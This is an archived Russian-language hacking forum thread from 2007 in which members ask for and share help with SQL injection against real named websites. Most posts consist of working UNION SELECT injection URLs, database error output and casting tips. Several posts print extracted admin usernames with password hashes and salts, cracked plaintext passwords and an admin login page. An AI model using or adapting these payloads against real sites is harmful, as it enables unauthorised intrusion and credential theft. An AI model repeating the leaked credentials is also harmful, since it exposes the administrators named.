ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.03.2007, 22:12
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Помощь Sql Иньекции.
Если вы хотите что бы вам быстро оказали помощь оставляте ссыки на предпологаемые вами sql иньекции.
Здесь оставляем ссылки вида.
PHP код:
http://site.ru/index.php?id=[sql]
Все остальные ссылки рассматривать не будут.
Последний раз редактировалось [ cash ]; 27.03.2007 в 23:27..
|
|
|
27.03.2007, 22:44
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
ссыки? Блин, Кэш, глаза чуть не сломал пока читал месадж, исправь ошибки, не в обиду
ЗЫ
__http://prod1.cmj.com/articles/display_article.php?id=6547215'
16 колонок, вывод не осилил
Ошибки разные, отсюда делаю вывод что юнион должен работать, иначе бы типы данных игнорились:
Код:
__http://prod1.cmj.com/articles/display_article.php?id=-6547215'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Implicit conversion from datatype 'VARCHAR' to 'INT' is not allowed. Use the CONVERT function to run this query
__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,nulll--
Invalid column name 'nulll'=====================================================================:::
__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
Column of type (BIT) does not allow nulls. It may not be compared with null
__http://prod1.cmj.com/articles/display_article.php?id=-6547215+union+select+null,null,null,null,null,null,null,null,null,0,null,null,null,null,null--
Implicit conversion from datatype 'VARCHAR' to 'INT' is not allowed. Use the CONVERT function to run this query
Последний раз редактировалось Thanat0z; 27.03.2007 в 22:49..
|
|
|
|
27.03.2007, 23:07
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке.
|
|
|
|
28.03.2007, 01:42
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530
Репутация:
2062
|
|
Сообщение от [ cash ]
Это Mssql. Учитывай это.
Выводимые данные не соответсвуют кодировке.
нужно использовать convert/aes_decrypt?
|
|
|
|
28.03.2007, 12:10
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
cast(TABLE as nvarchar)
cast(TABLE as int)
|
|
|
|
28.03.2007, 15:09
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375
Репутация:
4268
|
|
http://forum.pacan.net/kb.php?mode=cat&cat=23'
Не могу добраться до хэшей админа. Пхпбб.
|
|
|
|
11.04.2007, 17:57
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213
Репутация:
378
|
|
http://rabota.crimea.ua/agency.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat(username,0x3a,password)+fro m+forum_user/*
admin:f4773bcafa963af10487caa726a47458:xm|
md5 с солью
|
|
|
|
11.04.2007, 18:01
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
2InferNo23 - спасибоо!!! +
Там на форуме вобла 3.6.5 вроде стоит.
Может я немного в танке: xm| - salt, или это просто хm|
если просто xm, то можна ли из скуля достать salt?
Неохота зря брутить  если xm| не salt.
Еще раз пасибо.
Последний раз редактировалось AkyHa_MaTaTa; 11.04.2007 в 18:59..
|
|
|
|
11.04.2007, 19:12
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
да я таки в танке :http://rabota.crimea.ua/agency.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 %20,16,17,18,19,20,concat(username,0x3a,password,0 x3a,salt)+from+forum_user/* |
|
|
|
13.04.2007, 08:43
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от neval
http://cards.tut.by/holidays.php?event=-
немного не там, но:
Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,6/*&m=4
это вывод
Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,6+from+admins/*&m=4
подобрал таблицу ' admins'
Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,concat(login,0x3a,password)+from+admins/*&m=4
логин:пасс одного из админов
остальных перебираем лимитом
Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,concat(login,0x3a,password)+from+admins+limit+0,1/*&m=4
alesya:5aa0fa5819ba07df
vitovt:2e782c85379a326e
zettich:773359240eb9a1d9
mysql4-hash, перебор passwordspro или другими тулзами, удачи.
админка: _http://cards.tut.by/admin/login.php
//upd:
2e782c85379a326e = 12345
773359240eb9a1d9 = 123
нужно расшифровать #1 (:
Последний раз редактировалось n1†R0x; 13.04.2007 в 08:53..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид